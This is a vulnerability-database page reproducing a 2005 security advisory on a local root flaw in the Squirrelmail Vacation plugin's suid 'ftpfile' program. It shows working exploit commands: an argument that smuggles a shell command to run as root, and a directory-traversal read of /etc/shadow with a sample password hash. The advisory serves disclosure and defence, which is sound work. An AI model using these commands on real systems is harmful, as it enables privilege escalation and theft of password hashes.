Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

LSS-2005-01-03.txt

🗓️ 12 Jan 2005 00:00:00Reported by Leon JuranicType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 14 Views

Local root exploit in Squirrelmail vacation plugin allows privilege escalation and file read.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`  
LSS Security Advisory #LSS-2005-01-03  
http://security.lss.hr  
  
---  
  
Title : Squirrelmail vacation v0.15 local root exploit   
Advisory ID : LSS-2005-01-03  
Date : 10.01.2005.   
Advisory URL: : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03  
Impact : Privilege escalation and arbitrary file read  
Risk level : High   
Vulnerability type : Local  
Vendors contacted : No response from vendor  
  
  
---  
  
  
  
===[ Overview   
  
Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply  
message to incoming email. That is commonly used to notify the sender of   
the receiver's absence. Vacation plugin specifically uses the Vacation program.  
Plugin can be downloaded from:  
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz  
  
  
  
===[ Vulnerability  
  
Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.  
The program is used to access local files in user's home directory. There is  
a privilege escalation and arbitrary file read vulnerability in ftpfile.   
Command line arguments are passed to execve() function without checking  
for meta-characters, therefore making possible execution of commands as root.  
  
[ljuranic@laptop ljuranic]$ id  
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)  
[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"  
/bin/cp: omitting directory `/root/0'  
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)  
[ljuranic@laptop ljuranic]$   
  
It is also possible to read restricted files (such as /etc/shadow), since  
ftpfile can copy a file from user's home directory to any other  
directory without checking file name for directory traversal attack.  
  
$ ftpfile localhost root root get ../../../../etc/shadow ./shadow  
./shadow[ljuranic@laptop ljuranic]$ head ./shadow  
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::  
bin:*:10929:0:99999:7:::  
daemon:*:10929:0:99999:7:::  
lp:*:10929:0:99999:7:::  
[ljuranic@laptop ljuranic]$   
  
  
  
===[ Affected versions  
  
Squirrelmail Vacation v0.15 and previous versions.  
  
  
  
===[ Fix  
  
Not available yet.  
  
  
  
===[ PoC Exploit  
  
http://security.lss.hr/exploits/  
  
  
  
===[ Credits  
  
Credits for this vulnerability goes to Leon Juranic.   
  
  
  
===[ LSS Security Contact  
  
LSS Security Team, <eXposed by LSS>  
  
WWW : http://security.lss.hr  
E-mail : [email protected]  
Tel : +385 1 6129 775  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
12 Jan 2005 00:00Current
7.4High risk
Vulners AI Score7.4
squirrelmail vacation exploit privilege escalation arbitrary file read high risk vulnerability local vulnerability ftpfile program directory traversal attack
14
.json
Report